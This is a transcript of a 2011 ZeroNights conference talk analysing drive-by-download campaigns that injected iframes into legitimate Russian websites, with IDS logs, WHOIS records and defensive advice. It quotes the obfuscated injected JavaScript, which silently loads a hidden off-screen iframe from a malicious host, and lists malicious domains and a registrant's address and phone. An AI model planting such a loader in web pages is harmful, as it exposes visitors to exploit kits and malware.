vladimir kropotov - drive-by-download attack evolution before and after vulnerabilities’...
DESCRIPTION
International Security Conference "ZeroNights 2011" - http://www.zeronights.org/TRANSCRIPT
Drive-By-Download Attack Evolution Before and After Vulnerability
Disclosure
Vladimir B. Kropotov TBINFORM (TNK-BP Group)
Drive-By-Download
• Hackers distribute malware by "poisoning" legitimate websites
• Hacker injects malicious iframes into HTML content
• Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used by attacker
You just want information
about insurance, nothing
more, but…
What does it look like?
PC connected to
the Internet
Intermediate server
controlled by attacker
Known server with
iframe
Malware
Host ready
Exploit
Exploit server
controlled by attacker
Malware server
controlled by attacker
OS, browser
plugins, etc. INFO
How we find it? Date/Time 2011-08-05 10:44:53 YEKST
Tag Name PDF_XFA_Script
Observance Type Intrusion Detection
Cleared Flag false
Target IP Address 10.X.X.X
Target Object Name 9090
Target Object Type Target Port
Target Service unknown
Source IP Address 10.X.X.Y
SourcePort Name 2359
:compressed zlib
:server total.logeater.org
:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
How we find it? Date/Time 2011-08-05 10:44:53
Tag Name PDF_XFA_Script
Target IP Address 10.X.X.X
Target Object Name 9090
Target Object Type Target Port
Source IP Address 10.X.X.Y
SourcePort Name 2359
:compressed zlib
:server total.logeater.org
:URL //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
DOES USER NEED IT??
First indicators Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a
070d0b04020600510f0c56075c0
6040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/
First indicators
Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js
Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js
First indicators
Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php
Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php
First indicators Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a
070d0b04020600510f0c56075c0
6040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/
Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php
Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js
Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php
Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php
Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js
Example: o-strahovanie.ru
Example: o-strahovanie.ru
Example: o-strahovanie.ru SEP 02 / ============ bbb
============document.xmlSettings.if_ik=false;if(window.localStorage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) }); document.xmlSettings.iframe=document.createElement('iframe'); document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
Cookie:
if_ik1315314771
www.o-strahovanie.ru/
16004293056256333102392
93001403230174358*
Example: o-strahovanie.ru / ============ bbb ============
else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){
document.xmlSettings.iframe=
document.createElement('iframe'); document.xmlSettings.iframe.style.cssText=
'height:1px;position:absolute;width:1px;border:none;left:-5000px;';
document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.
iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
Cookie: if_ik1315314771
www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
Example: o-strahovanie.ru else{// 4 osel …
document.body.appendChild(document.xmlSettings.iframe);
document.xmlSettings.iframe.src=
'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';}
iframe.src=
'http://disregarding.in/xtqd2/08.php'
Drive By Download o-strahovanie.ru Sep 02
PC connected to
the Internet
Intermediate server
disregarding.in
Known server with
iframe
Malware
Host ready
Exploit NO
Exploit
server
NO
Malware
server
OS, browser
plugins, etc. INFO
Drive By Download o-strahovanie.ru Sep 12
PC connected to
the Internet
Intermediate server
disregarding.in
Known server with
iframe
Malware
Host ready
Exploit
Exploit server
chamberwoman.in
janiculum.in
Malware server
chamberwoman.in
janiculum.in
OS, browser
plugins, etc. INFO
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Registrant Name:Russell Rosario
Registrant Street1:136 Oakdale Avenue
City:Winter Haven
Registrant Country:US
Email:[email protected]
Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
Created On:12-Sep-2011 08:14 UTC
Registrant Name:Russell Rosario
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN
Created On:12-Sep-2011 08:14 UTC
Registrant Name:Russell Rosario
No Payload, because No Payload Requests?
Are they looking for customers?
Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain
Name:DISREGARDING.IN
Created On:14-Jul-2011 11:09:59 UTC
Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue
City:Winter Haven
Registrant Country:US
Email:[email protected] Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
Russell Rosario
filtrated.in Created On:14-Jul-2011 11:09:56 UTC
raptnesses.in Created On:14-Jul-2011 11:09:56 UTC
tansies.in Created On:14-Jul-2011 11:10:03 UTC
Domain Name:FILTRATED.IN Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web
Services Pvt. Ltd. (R118-AFIN) Registrant ID:TS_16731618
Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Registrant City:Winter Haven Registrant State/Province:Florida Registrant Postal Code:33830 Registrant Country:US Registrant Phone:+1.8635571308
Email:[email protected]
But Sally Doesn't Know…
Attack before public disclosure
• Primary location for malicious sites: .IN
• Physical servers location by IP-Address: Romania
• Responsible person: Russell Rosario
• Domains are new
Domain owner is the same
Domain Name Created On Registrant Name
irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario
comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario
hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario
suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario
ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario
20-Jul-2011 Acrobat Vulnerability vendor notified
Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
X. DISCLOSURE TIMELINE
-----------------------------
2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
2011-09-14 - Public disclosure
ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-26 - Coordinated public release of advisory
ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-27 - Coordinated public release of advisory
Harvetering machine started Domain Name Created On Registrant Name
microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario
oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario
provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario
vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario
kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario
invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario
alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario
dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario
xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario
alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario
skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario
inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario
allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
But may be someone knows?
• Spamlists
• AV Vendors
• Safebrowsing
• Securityfocus
Spamlists, Aug 19
AV Vendors, Aug 18
Safebrowsing Aug 20
Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM
Subject: There is a strange get request header in all web
pages of my site? I'm worry about Trojan attack!
Today I found that Kasper Anti Virus has blocked my site
and says to the clients that this site is affected by a Trojan.
I traced my site with Fiddler debugging tool and I found
that every time I send a request
to the site a GET request handler is established
to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa2
4nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure Sep 14. What to expect?
PDF vulnerabilities public disclosure Sep 14. What to expect?
NO GOOD NEWS,
JUST EPIC FAIL
for site administrators
No good news. Hundreds of domains were registered
ITALIA-NEW.IN
BANER-KLERK.RU
BANK-KLERK.RU
BANNER-KLERK.RU
BLOGS-KLERK.RU
BUH-KLERK.RU
DAILY-KP.RU
FORUM-KLERK.RU
I-OBOZREVATEL.RU
INTERFAX-REGION.RU
JOB-KLERK.RU
KLERK-BANK.RU
KLERK-BANKIR.RU
KLERK-BIZ.RU
KLERK-BOSS.RU
KLERK-BUH.RU
KLERK-EVEN.RU
KLERK-EVENTS.RU
KLERK-LAW.RU
KLERK-NEW.RU
KLERK-NEWS.RU
KLERK-REKLAMA.RU
KLERK-RU.RU
KLERK-WORK.RU
KLERK2.RU
OBOZREVATEL-RU.RU
OBOZREVATELRU.RU
WIKI-KLERK.RU
PRESS-RZD.RU
RZD-RZD.RU
IPGEOBASE.IN
* * *
“New generation”
PC connected to
the Internet
Intermediate server
controlled by attacker
Known server with
iframe
Malware
Host ready
Exploit
Exploit server
controlled by attacker
Malware server
controlled by attacker
OS, browser
plugins, etc. INFO
Other known server
NOT controlled by attacker
Attack after public disclosure • Primary location for malicious sites:
.IN, .RU, .CX.CC, .BIZ, .INFO,…
• Physical servers location by IP-Address: International
• Domains registered to different spurious persons
• Domain lifetime ~ time to Blacklists appearance
• Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique)
• If you don't know exact malware URL, site redirects to well known server
• Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
Known sites examples: KP.RU
Other examples: EG.RU (newspaper, 263 685 visits per day)
Other examples: svpressa.ru (newspaper 276 720 visits per day)
Malware examples: Banks targeted attack
Malware examples: Banks targeted attack
• Legal
• Faked
Another news,
another phone…
Malware examples: Banks targeted attack
Malware examples
Malware examples
Script examples
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
What can we do?
• Patch endpoint
• Tighten the Internet filtering (default deny
if possible)
• No Internet surfing with admin rights
• See what’s happening (continuous
monitoring)
• Check if you’re well (regular technical
audits)
• Educate people
Credits
• Sergey V. Soldatov,
TBINFORM (TNK-BP Group)
• Konstantin Y. Kadushkin,
TBINFORM (TNK-BP Group)
• Wayne Huang,
ARMORIZE
THE END
Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group)